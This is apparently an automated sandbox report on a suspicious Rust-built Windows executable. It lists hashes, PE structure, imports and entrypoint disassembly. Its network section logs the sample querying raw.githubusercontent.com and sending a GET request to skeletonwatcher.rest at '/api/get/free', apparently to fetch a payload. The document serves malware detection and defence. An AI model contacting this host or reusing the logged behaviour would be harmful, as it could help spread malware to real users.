                                                                                                                                                  Preview:.C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\f2b3v2t5\f2b3v2t5.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\f2b3v2t5\f2b3v2t5.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

                                                                                                                                                  Static File Info

                                                                                                                                                  General

                                                                                                                                                  File type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                  Entropy (8bit):6.810579722471848
                                                                                                                                                  TrID:
                                                                                                                                                  • Win64 Executable Console (202006/5) 87.25%
                                                                                                                                                  • Visual Basic Script (13500/0) 5.83%
                                                                                                                                                  • Win64 Executable (generic) (12005/4) 5.19%
                                                                                                                                                  • Generic Win/DOS Executable (2004/3) 0.87%
                                                                                                                                                  • DOS Executable Generic (2002/1) 0.86%
                                                                                                                                                  File name:dGhlYXB0Z3JvdXA=-free.exe
                                                                                                                                                  File size:34'433'319 bytes
                                                                                                                                                  MD5:ede0a1c97eaa446541dcfccd6fa9a6a7
                                                                                                                                                  SHA1:e578715a247461d460899af7302152c5daf4365e
                                                                                                                                                  SHA256:5a94644716cf1ab8c197ecad93562924c3bfb36224b8c0b68e26a252f3e713d8
                                                                                                                                                  SHA512:52ab94a2df444225f84664c8e6039a91efd04141ba0354f8e370144a69340be08406b0efd12943f9963524dfaf94a5d9acf4a835f156cacbf5e014f86e3d15cd
                                                                                                                                                  SSDEEP:393216:173Y9M927d8MFbOvYHJKOVLuLLna3W8oLPnJ:173Y9MwJ8M08KOoLG3W8oLJ
                                                                                                                                                  TLSH:49777C03BA8618A9D09DC474834B46639B213CDB1B39B9FF25D935252F7EAF05B3A314
                                                                                                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Y5.h.T.;.T.;.T.;.?.:;T.;.?.:.T.;.?.:.T.;...;.T.;.%.:,T.;.%.:.T.;.%.:.T.;.?.:.T.;.T.;.T.;.&.:.T.;.T.;.V.;.&.:.T.;.&&;.T.;.&.:.T.

                                                                                                                                                  File Icon

                                                                                                                                                  Icon Hash:13696df8f8f8924c

                                                                                                                                                  Static PE Info

                                                                                                                                                  General

                                                                                                                                                  Entrypoint:0x14152fd70
                                                                                                                                                  Entrypoint Section:.text
                                                                                                                                                  Digitally signed:false
                                                                                                                                                  Imagebase:0x140000000
                                                                                                                                                  Subsystem:windows cui
                                                                                                                                                  Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                                                                                  DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                                                                  Time Stamp:0x5FEC9DFF [Wed Dec 30 15:34:23 2020 UTC]
                                                                                                                                                  TLS Callbacks:0x4085d620, 0x1
                                                                                                                                                  CLR (.Net) Version:
                                                                                                                                                  OS Version Major:6
                                                                                                                                                  OS Version Minor:0
                                                                                                                                                  File Version Major:6
                                                                                                                                                  File Version Minor:0
                                                                                                                                                  Subsystem Version Major:6
                                                                                                                                                  Subsystem Version Minor:0
                                                                                                                                                  Import Hash:f89058cc20f309b3f79572b824dcfee6

                                                                                                                                                  Entrypoint Preview

                                                                                                                                                  Instruction
                                                                                                                                                  dec eax
                                                                                                                                                  sub esp, 28h
                                                                                                                                                  call 00007F0E64D8CA28h
                                                                                                                                                  dec eax
                                                                                                                                                  add esp, 28h
                                                                                                                                                  jmp 00007F0E64D8C287h
                                                                                                                                                  int3
                                                                                                                                                  int3
                                                                                                                                                  dec eax
                                                                                                                                                  sub esp, 28h
                                                                                                                                                  dec ebp
                                                                                                                                                  mov eax, dword ptr [ecx+38h]
                                                                                                                                                  dec eax
                                                                                                                                                  mov ecx, edx
                                                                                                                                                  dec ecx
                                                                                                                                                  mov edx, ecx
                                                                                                                                                  call 00007F0E64D8C422h
                                                                                                                                                  mov eax, 00000001h
                                                                                                                                                  dec eax
                                                                                                                                                  add esp, 28h
                                                                                                                                                  ret
                                                                                                                                                  int3
                                                                                                                                                  int3
                                                                                                                                                  int3
                                                                                                                                                  inc eax
                                                                                                                                                  push ebx
                                                                                                                                                  inc ebp
                                                                                                                                                  mov ebx, dword ptr [eax]
                                                                                                                                                  dec eax
                                                                                                                                                  mov ebx, edx
                                                                                                                                                  inc ecx
                                                                                                                                                  and ebx, FFFFFFF8h
                                                                                                                                                  dec esp
                                                                                                                                                  mov ecx, ecx
                                                                                                                                                  inc ecx
                                                                                                                                                  test byte ptr [eax], 00000004h
                                                                                                                                                  dec esp
                                                                                                                                                  mov edx, ecx
                                                                                                                                                  je 00007F0E64D8C425h
                                                                                                                                                  inc ecx
                                                                                                                                                  mov eax, dword ptr [eax+08h]
                                                                                                                                                  dec ebp
                                                                                                                                                  arpl word ptr [eax+04h], dx
                                                                                                                                                  neg eax
                                                                                                                                                  dec esp
                                                                                                                                                  add edx, ecx
                                                                                                                                                  dec eax
                                                                                                                                                  arpl ax, cx
                                                                                                                                                  dec esp
                                                                                                                                                  and edx, ecx
                                                                                                                                                  dec ecx
                                                                                                                                                  arpl bx, ax
                                                                                                                                                  dec edx
                                                                                                                                                  mov edx, dword ptr [eax+edx]
                                                                                                                                                  dec eax
                                                                                                                                                  mov eax, dword ptr [ebx+10h]
                                                                                                                                                  mov ecx, dword ptr [eax+08h]
                                                                                                                                                  dec eax
                                                                                                                                                  mov eax, dword ptr [ebx+08h]
                                                                                                                                                  test byte ptr [ecx+eax+03h], 0000000Fh
                                                                                                                                                  je 00007F0E64D8C41Dh
                                                                                                                                                  movzx eax, byte ptr [ecx+eax+03h]
                                                                                                                                                  and eax, FFFFFFF0h
                                                                                                                                                  dec esp
                                                                                                                                                  add ecx, eax
                                                                                                                                                  dec esp
                                                                                                                                                  xor ecx, edx
                                                                                                                                                  dec ecx
                                                                                                                                                  mov ecx, ecx
                                                                                                                                                  pop ebx
                                                                                                                                                  jmp 00007F0E64D8C426h
                                                                                                                                                  int3
                                                                                                                                                  int3
                                                                                                                                                  int3
                                                                                                                                                  int3
                                                                                                                                                  int3
                                                                                                                                                  int3
                                                                                                                                                  int3
                                                                                                                                                  nop word ptr [eax+eax+00000000h]
                                                                                                                                                  dec eax
                                                                                                                                                  cmp ecx, dword ptr [00A3D2C1h]
                                                                                                                                                  jne 00007F0E64D8C425h
                                                                                                                                                  dec eax
                                                                                                                                                  rol ecx, 10h
                                                                                                                                                  test cx, FFFFh
                                                                                                                                                  jne 00007F0E64D8C415h
                                                                                                                                                  ret
                                                                                                                                                  dec eax
                                                                                                                                                  ror ecx, 10h
                                                                                                                                                  jmp 00007F0E64D8CD3Ch
                                                                                                                                                  int3
                                                                                                                                                  int3
                                                                                                                                                  int3
                                                                                                                                                  inc eax
                                                                                                                                                  push ebx
                                                                                                                                                  dec eax

                                                                                                                                                  Data Directories

                                                                                                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x1f598900x68.rdata
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x1f598f80xa0.rdata
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x20600000x5084.rsrc
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x1f8c0000xd2378.pdata
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x20660000x1d308.reloc
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x1d78fe80x54.rdata
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x1d791800x28.rdata
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x1d790400x138.rdata
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x15600000x758.rdata
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                  Sections

                                                                                                                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                  .text0x10000x155e6a00x155e8005dd19ef7ee076e0d89cacb281bd94528unknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                  .rdata0x15600000x9fb1e40x9fb200cbad2020cf41a27fa6ee9ee4c10f33d8unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                  .data0x1f5c0000x2f9e00x11e0051ecf0e0221c4fe5cc72d7c0d642f757False0.14178594842657344data2.77637946428186IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                  .pdata0x1f8c0000xd23780xd2400711bc06da1d5afe0a08f5b20756b06edFalse0.45217514491676575data6.880219414842573IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                  _RDATA0x205f0000x940x200cb7fee38457a4f11371c8882f560f7b2False0.212890625data1.7840059761324978IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                  .rsrc0x20600000x50840x5200d1069b2a1391e8b52c913a236b75b64aFalse0.9297351371951219data7.815647380372444IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                  .reloc0x20660000x1d3080x1d4004495e6c3818044f31171e2aea60d7122False0.20582932692307693data5.4835830175533795IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                                                  Resources

                                                                                                                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                  RT_ICON0x20601d80x2ddPNG image data, 16 x 16, 8-bit/color RGBA, non-interlacedEnglishUnited States1.015006821282401
                                                                                                                                                  RT_ICON0x20604b80x54aPNG image data, 24 x 24, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0081240768094535
                                                                                                                                                  RT_ICON0x2060a080x7b6PNG image data, 32 x 32, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0030395136778116
                                                                                                                                                  RT_ICON0x20611c00xbcePNG image data, 48 x 48, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9923891462607545
                                                                                                                                                  RT_ICON0x2061d900xf62PNG image data, 64 x 64, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0027932960893855
                                                                                                                                                  RT_ICON0x2062cf80x201aPNG image data, 128 x 128, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0004867364322219
                                                                                                                                                  RT_GROUP_ICON0x2064d180x5adataEnglishUnited States0.8111111111111111
                                                                                                                                                  RT_VERSION0x2064d780x30cdataEnglishUnited States0.46923076923076923

                                                                                                                                                  Imports

                                                                                                                                                  DLLImport
                                                                                                                                                  WS2_32.dlllisten, WSAGetLastError, closesocket, WSASendTo, WSARecvFrom, WSAGetOverlappedResult, setsockopt, WSASend, getsockopt, WSAIoctl, WSASocketW, WSARecv, getaddrinfo, getpeername, shutdown, recv, ioctlsocket, getsockname, WSACleanup, WSAStartup, freeaddrinfo, bind
                                                                                                                                                  KERNEL32.dllGetOEMCP, GetACP, IsValidCodePage, MultiByteToWideChar, GetStringTypeW, HeapSize, GetFileSizeEx, GetConsoleOutputCP, EnumSystemLocalesW, GetUserDefaultLCID, IsValidLocale, GetLocaleInfoW, LCMapStringW, CompareStringW, GetTimeFormatW, GetDateFormatW, GetCommandLineA, SwitchToThread, SetConsoleMode, LeaveCriticalSection, CloseHandle, SetConsoleCursorPosition, lstrlenW, WaitForSingleObject, GetLastError, GetExitCodeProcess, GetCurrentProcessId, GetCommandLineW, GetProcessHeap, HeapFree, AddVectoredExceptionHandler, HeapAlloc, HeapReAlloc, GetStdHandle, GetFileInformationByHandleEx, GetConsoleMode, EnterCriticalSection, Sleep, DeviceIoControl, CreateHardLinkW, ReadFile, TerminateProcess, FreeLibrary, RegisterWaitForSingleObject, GetEnvironmentStringsW, FreeEnvironmentStringsW, GetProcessId, GetConsoleScreenBufferInfo, OpenProcess, SetCurrentDirectoryW, SetErrorMode, SetThreadErrorMode, LoadLibraryW, GetProcAddress, SetEnvironmentVariableW, CreateToolhelp32Snapshot, Process32First, Process32Next, SetFileTime, PostQueuedCompletionStatus, GetQueuedCompletionStatusEx, SetFileCompletionNotificationModes, CancelIoEx, WriteFile, GetOverlappedResult, CreateIoCompletionPort, SetHandleInformation, WaitForSingleObjectEx, CreateFileW, CreateSemaphoreW, ReadDirectoryChangesW, ReleaseSemaphore, CancelIo, GetSystemInfo, SetFileInformationByHandle, GetConsoleCursorInfo, SetConsoleCursorInfo, ReadConsoleInputW, FillConsoleOutputCharacterA, FillConsoleOutputAttribute, GetFileInformationByHandle, TlsGetValue, TlsSetValue, DeleteCriticalSection, GetModuleHandleW, SetLastError, GetEnvironmentVariableW, WriteConsoleW, InitializeCriticalSection, GetCurrentProcess, GetCurrentThread, RtlCaptureContext, GetCurrentDirectoryW, LoadLibraryA, CreateMutexA, RtlLookupFunctionEntry, TlsAlloc, FormatMessageW, GetTempPathW, GetModuleFileNameW, FlushFileBuffers, DuplicateHandle, SetFilePointerEx, FindNextFileW, CreateDirectoryW, ReadConsoleW, TryEnterCriticalSection, FindFirstFileW, CreateProcessW, CreateNamedPipeW, CreateEventW, WaitForMultipleObjects, ExitProcess, QueryPerformanceCounter, QueryPerformanceFrequency, GetSystemTimeAsFileTime, FindClose, DeleteFileW, MoveFileExW, RemoveDirectoryW, RtlUnwind, CopyFileExW, CreateThread, GetFinalPathNameByHandleW, UnregisterWaitEx, SetConsoleTextAttribute, GetSystemTimes, GlobalMemoryStatusEx, GetVersionExA, RtlVirtualUnwind, GetTimeZoneInformation, WideCharToMultiByte, GetThreadTimes, GetCurrentThreadId, DeleteFileA, GetTempPathA, GetTempFileNameA, GetFileType, OutputDebugStringA, VerSetConditionMask, VerifyVersionInfoW, VirtualAlloc, VirtualFree, IsDebuggerPresent, TlsFree, QueryThreadCycleTime, GetThreadPriority, SetThreadPriority, AcquireSRWLockExclusive, ReleaseSRWLockExclusive, TryAcquireSRWLockExclusive, AcquireSRWLockShared, ReleaseSRWLockShared, VirtualProtect, RtlAddFunctionTable, RtlDeleteFunctionTable, LoadLibraryExW, WakeConditionVariable, WakeAllConditionVariable, SleepConditionVariableSRW, InitOnceExecuteOnce, SetUnhandledExceptionFilter, RtlCaptureStackBackTrace, GetNativeSystemInfo, InitializeConditionVariable, OpenThread, SuspendThread, GetThreadContext, ResumeThread, CreateSemaphoreA, GetCPInfo, FindFirstFileExW, SetStdHandle, SetEndOfFile, ReleaseMutex, SetFileAttributesW, FreeLibraryAndExitThread, ExitThread, GetModuleHandleExW, EncodePointer, RtlUnwindEx, RaiseException, RtlPcToFileHeader, IsProcessorFeaturePresent, GetStartupInfoW, UnhandledExceptionFilter, InitializeSListHead, ResetEvent, SetEvent, InitializeCriticalSectionAndSpinCount
                                                                                                                                                  ADVAPI32.dllRegQueryValueExW, RegOpenKeyExW, SystemFunction036, RegCloseKey
                                                                                                                                                  dbghelp.dllSymInitialize, SymGetSearchPathW, SymSetSearchPathW, SymGetModuleBase64, SymFunctionTableAccess64, SymSetOptions, SymFromAddr, SymGetLineFromAddr64, StackWalk64
                                                                                                                                                  ole32.dllCoTaskMemFree
                                                                                                                                                  SHELL32.dllSHGetKnownFolderPath
                                                                                                                                                  WINMM.dlltimeGetTime

                                                                                                                                                  Exports

                                                                                                                                                  NameOrdinalAddress
                                                                                                                                                  CrashForExceptionInNonABICompliantCodeRange10x140bd31a0

                                                                                                                                                  Possible Origin

                                                                                                                                                  Language of compilation systemCountry where language is spokenMap
                                                                                                                                                  EnglishUnited States

                                                                                                                                                  Network Behavior

                                                                                                                                                  Network Port Distribution

                                                                                                                                                  TCP Packets

                                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                  Jan 2, 2025 08:59:26.264153004 CET4920853192.168.2.51.1.1.1
                                                                                                                                                  Jan 2, 2025 08:59:26.268944979 CET53492081.1.1.1192.168.2.5
                                                                                                                                                  Jan 2, 2025 08:59:26.269076109 CET4920853192.168.2.51.1.1.1
                                                                                                                                                  Jan 2, 2025 08:59:26.273996115 CET53492081.1.1.1192.168.2.5
                                                                                                                                                  Jan 2, 2025 08:59:26.786333084 CET4920853192.168.2.51.1.1.1
                                                                                                                                                  Jan 2, 2025 08:59:26.803054094 CET49214443192.168.2.5185.199.110.133
                                                                                                                                                  Jan 2, 2025 08:59:26.803107023 CET44349214185.199.110.133192.168.2.5
                                                                                                                                                  Jan 2, 2025 08:59:26.803714991 CET4920853192.168.2.51.1.1.1
                                                                                                                                                  Jan 2, 2025 08:59:26.803778887 CET49214443192.168.2.5185.199.110.133
                                                                                                                                                  Jan 2, 2025 08:59:26.804413080 CET49214443192.168.2.5185.199.110.133
                                                                                                                                                  Jan 2, 2025 08:59:26.804429054 CET44349214185.199.110.133192.168.2.5
                                                                                                                                                  Jan 2, 2025 08:59:26.808870077 CET53492081.1.1.1192.168.2.5
                                                                                                                                                  Jan 2, 2025 08:59:26.810878038 CET4920853192.168.2.51.1.1.1
                                                                                                                                                  Jan 2, 2025 08:59:27.264209986 CET44349214185.199.110.133192.168.2.5
                                                                                                                                                  Jan 2, 2025 08:59:27.264769077 CET49214443192.168.2.5185.199.110.133
                                                                                                                                                  Jan 2, 2025 08:59:27.264794111 CET44349214185.199.110.133192.168.2.5
                                                                                                                                                  Jan 2, 2025 08:59:27.264868975 CET49214443192.168.2.5185.199.110.133
                                                                                                                                                  Jan 2, 2025 08:59:27.264875889 CET44349214185.199.110.133192.168.2.5
                                                                                                                                                  Jan 2, 2025 08:59:27.265942097 CET44349214185.199.110.133192.168.2.5
                                                                                                                                                  Jan 2, 2025 08:59:27.266007900 CET49214443192.168.2.5185.199.110.133
                                                                                                                                                  Jan 2, 2025 08:59:27.266351938 CET49214443192.168.2.5185.199.110.133
                                                                                                                                                  Jan 2, 2025 08:59:27.266388893 CET49214443192.168.2.5185.199.110.133
                                                                                                                                                  Jan 2, 2025 08:59:27.266496897 CET44349214185.199.110.133192.168.2.5
                                                                                                                                                  Jan 2, 2025 08:59:27.266542912 CET49214443192.168.2.5185.199.110.133
                                                                                                                                                  Jan 2, 2025 08:59:37.491955996 CET4928580192.168.2.5188.114.97.3
                                                                                                                                                  Jan 2, 2025 08:59:37.496721029 CET8049285188.114.97.3192.168.2.5
                                                                                                                                                  Jan 2, 2025 08:59:37.496795893 CET4928580192.168.2.5188.114.97.3
                                                                                                                                                  Jan 2, 2025 08:59:37.497200966 CET4928580192.168.2.5188.114.97.3
                                                                                                                                                  Jan 2, 2025 08:59:37.501987934 CET8049285188.114.97.3192.168.2.5
                                                                                                                                                  Jan 2, 2025 08:59:37.950889111 CET8049285188.114.97.3192.168.2.5
                                                                                                                                                  Jan 2, 2025 08:59:37.950901985 CET8049285188.114.97.3192.168.2.5
                                                                                                                                                  Jan 2, 2025 08:59:37.950918913 CET8049285188.114.97.3192.168.2.5
                                                                                                                                                  Jan 2, 2025 08:59:37.950938940 CET8049285188.114.97.3192.168.2.5
                                                                                                                                                  Jan 2, 2025 08:59:37.951011896 CET4928580192.168.2.5188.114.97.3
                                                                                                                                                  Jan 2, 2025 08:59:37.951040030 CET4928580192.168.2.5188.114.97.3
                                                                                                                                                  Jan 2, 2025 08:59:38.489793062 CET4928580192.168.2.5188.114.97.3
                                                                                                                                                  Jan 2, 2025 08:59:38.494858980 CET8049285188.114.97.3192.168.2.5
                                                                                                                                                  Jan 2, 2025 08:59:38.494924068 CET4928580192.168.2.5188.114.97.3

                                                                                                                                                  UDP Packets

                                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                  Jan 2, 2025 08:59:26.263179064 CET53515811.1.1.1192.168.2.5
                                                                                                                                                  Jan 2, 2025 08:59:26.718080044 CET6022253192.168.2.51.1.1.1
                                                                                                                                                  Jan 2, 2025 08:59:26.725481033 CET53602221.1.1.1192.168.2.5
                                                                                                                                                  Jan 2, 2025 08:59:37.467358112 CET5259153192.168.2.51.1.1.1
                                                                                                                                                  Jan 2, 2025 08:59:37.490730047 CET53525911.1.1.1192.168.2.5

                                                                                                                                                  DNS Queries

                                                                                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                  Jan 2, 2025 08:59:26.718080044 CET192.168.2.51.1.1.10x29e3Standard query (0)raw.githubusercontent.comA (IP address)IN (0x0001)false
                                                                                                                                                  Jan 2, 2025 08:59:37.467358112 CET192.168.2.51.1.1.10x8d04Standard query (0)skeletonwatcher.restA (IP address)IN (0x0001)false

                                                                                                                                                  DNS Answers

                                                                                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                  Jan 2, 2025 08:59:26.725481033 CET1.1.1.1192.168.2.50x29e3No error (0)raw.githubusercontent.com185.199.110.133A (IP address)IN (0x0001)false
                                                                                                                                                  Jan 2, 2025 08:59:26.725481033 CET1.1.1.1192.168.2.50x29e3No error (0)raw.githubusercontent.com185.199.109.133A (IP address)IN (0x0001)false
                                                                                                                                                  Jan 2, 2025 08:59:26.725481033 CET1.1.1.1192.168.2.50x29e3No error (0)raw.githubusercontent.com185.199.111.133A (IP address)IN (0x0001)false
                                                                                                                                                  Jan 2, 2025 08:59:26.725481033 CET1.1.1.1192.168.2.50x29e3No error (0)raw.githubusercontent.com185.199.108.133A (IP address)IN (0x0001)false
                                                                                                                                                  Jan 2, 2025 08:59:37.490730047 CET1.1.1.1192.168.2.50x8d04No error (0)skeletonwatcher.rest188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                  Jan 2, 2025 08:59:37.490730047 CET1.1.1.1192.168.2.50x8d04No error (0)skeletonwatcher.rest188.114.96.3A (IP address)IN (0x0001)false

                                                                                                                                                  HTTP Request Dependency Graph

                                                                                                                                                  • skeletonwatcher.rest

                                                                                                                                                  HTTP Packets

                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                  0192.168.2.549285188.114.97.3806004C:\Users\user\Desktop\dGhlYXB0Z3JvdXA=-free.exe
                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                  Jan 2, 2025 08:59:37.497200966 CET122OUTGET /api/get/free HTTP/1.1
                                                                                                                                                  accept: */*
                                                                                                                                                  user-agent: Deno/1.6.3
                                                                                                                                                  accept-encoding: gzip, br
                                                                                                                                                  host: skeletonwatcher.rest
                                                                                                                                                  Jan 2, 2025 08:59:37.950889111 CET1236INHTTP/1.1 403 Forbidden
                                                                                                                                                  Date: Thu, 02 Jan 2025 07:59:37 GMT
                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                  Connection: keep-alive
                                                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                                                  Referrer-Policy: same-origin
                                                                                                                                                  Cache-Control: max-age=15
                                                                                                                                                  Expires: Thu, 02 Jan 2025 07:59:52 GMT
                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WxwCcR3duDu6tb7BHuiskrOr339PyGUN5chm%2Fr8RL3EUM23nSHRZRAzoEk4JRIDG%2F1%2B62bbxsxFFFK9ZT8Hk0AP4%2FTJVzQORMNfQmdXDM2yle%2FY39nglQByKRxzQcjnu1x4Al2t25Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                  Server: cloudflare
                                                                                                                                                  CF-RAY: 8fb935f5dce7f795-EWR
                                                                                                                                                  Content-Encoding: gzip
                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1402&min_rtt=1402&rtt_var=701&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=122&delivery_rate=0&cwnd=185&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                  Data Raw: 36 63 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ad 58 6d 6f dc b8 11 fe be bf 62 ac 02 f6 2e b0 94 ec bc 5c 1c 5b ab e2 9a b8 80 81 14 97 5e 1c b4 c1 21 30 28 72 b4 e2 99 22 55 92 5a 79 e1 fa bf 17 14 a5 b5 f6 c5 be 06 2d 60 c0 a2 38 7c 66 f8 cc 33 23 72 d3 a3 8f bf 7c b8 f9 f6 f9 0a 4a 57 c9 6c 92 1e 11 f2 9b 28 40 3a b8 be 82 77 df 33 48 fd 04 30 49 ad 5d 44 4a 93 df 2d 08 fc 09 b4 e4 02 23 90 54 2d 17 11 2a f2 f5 4b 94 41 7a f4 1b 2a 2e 8a ef 84 3c 41 f5 38 00 87 a1 de fd 18 d4 f9 0b 50 e7 3f 00 b5 74 3d 9a 7f 71 68 97 fb 28 84 6c 23 95 48 79 36 49 9d 70 12 b3 9f 9d 43 e5 84 56 f0 2b fe ab 11 06 f9 11 fc 1b 3e 48 dd f0 42 52 83 69 12 ec 26 69 85 8e 02 2b a9 b1 e8 16 d1 d7 9b bf 92 f3 08 92 61 a2 74 ae 26 1e 61 b5 88 3e 68 e5 41 c9 cd ba c6 08 58 18 2d 22 87 f7 2e f1 f1 5e 6e 60 5e 42 f9 27 f9 fa 33 f9 a0 ab 9a 3a 91 cb 31 d0 f5 d5 e2 8a 2f 71 b4 4e
                                                                                                                                                  Data Ascii: 6cdXmob.\[^!0(r"UZy-`8|f3#r|JWl(@:w3H0I]DJ-#T-*KAz*.<A8P?t=qh(l#Hy6IpCV+>HBRi&i+at&a>hAX-".^n`^B'3:1/qN
                                                                                                                                                  Jan 2, 2025 08:59:37.950901985 CET224INData Raw: d1 0a 17 91 d1 b9 76 76 64 a8 b4 50 1c ef e7 a0 74 a1 a5 d4 ed de 92 95 c0 b6 d6 c6 8d 16 b5 82 bb 72 c1 71 25 18 92 6e 30 17 4a 38 41 25 b1 8c 4a 5c 9c 05 14 29 d4 1d 18 94 8b c8 ba b5 44 5b 22 ba 08 04 5f 44 ac b8 0d af 08 b3 36 82 d2 60 b1 88
                                                                                                                                                  Data Ascii: vvdPtrq%n0J8A%J\)D["_D6`aK1;dWg8yr!{9C/Gj\CERr.1@d2R N{NR]6L]%uL;W&Znc$Cfz)G~2Q
                                                                                                                                                  Jan 2, 2025 08:59:37.950918913 CET1236INData Raw: e7 74 58 0d b0 a2 06 7a 60 09 0b e0 9a 35 15 2a 17 2f d1 5d 49 f4 8f 7f 59 5f f3 e9 49 b0 21 54 a2 71 27 b3 cb 7e f5 b0 32 ee f6 15 73 61 6b 49 d7 b0 80 93 5c 6a 76 77 12 ec 1e 67 13 80 c7 49 9a 0c 5b db ab a2 c9 24 4d fa 42 f2 dc f9 cd a7 5c ac
                                                                                                                                                  Data Ascii: tXz`5*/]IY_I!Tq'~2sakI\jvwgI[$MB\Fe\7)+BH0<.A~G{%g:%F6>K!wj4b5B8:*Mt[;J?lWh|ymw[XQEZ7PB3B&(O sQ
                                                                                                                                                  Jan 2, 2025 08:59:37.950938940 CET6INData Raw: 0a 30 0d 0a 0d 0a
                                                                                                                                                  Data Ascii: 0


                                                                                                                                                  Statistics

                                                                                                                                                  CPU Usage

                                                                                                                                                  Click to jump to process

                                                                                                                                                  Memory Usage

                                                                                                                                                  Click to jump to process

                                                                                                                                                  High Level Behavior Distribution

                                                                                                                                                  Click to dive into process behavior distribution

                                                                                                                                                  Behavior

                                                                                                                                                  Click to jump to process

                                                                                                                                                  System Behavior

                                                                                                                                                  General

                                                                                                                                                  Target ID:0
                                                                                                                                                  Start time:02:59:06
                                                                                                                                                  Start date:02/01/2025
                                                                                                                                                  Path:C:\Users\user\Desktop\dGhlYXB0Z3JvdXA=-free.exe
                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                  Commandline:"C:\Users\user\Desktop\dGhlYXB0Z3JvdXA=-free.exe"
                                                                                                                                                  Imagebase:0x7ff675780000
                                                                                                                                                  File size:34'433'319 bytes
                                                                                                                                                  MD5 hash:EDE0A1C97EAA446541DCFCCD6FA9A6A7
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:Rust
                                                                                                                                                  Reputation:low
                                                                                                                                                  Has exited:true

                                                                                                                                                  General

                                                                                                                                                  Target ID:1
                                                                                                                                                  Start time:02:59:06
                                                                                                                                                  Start date:02/01/2025
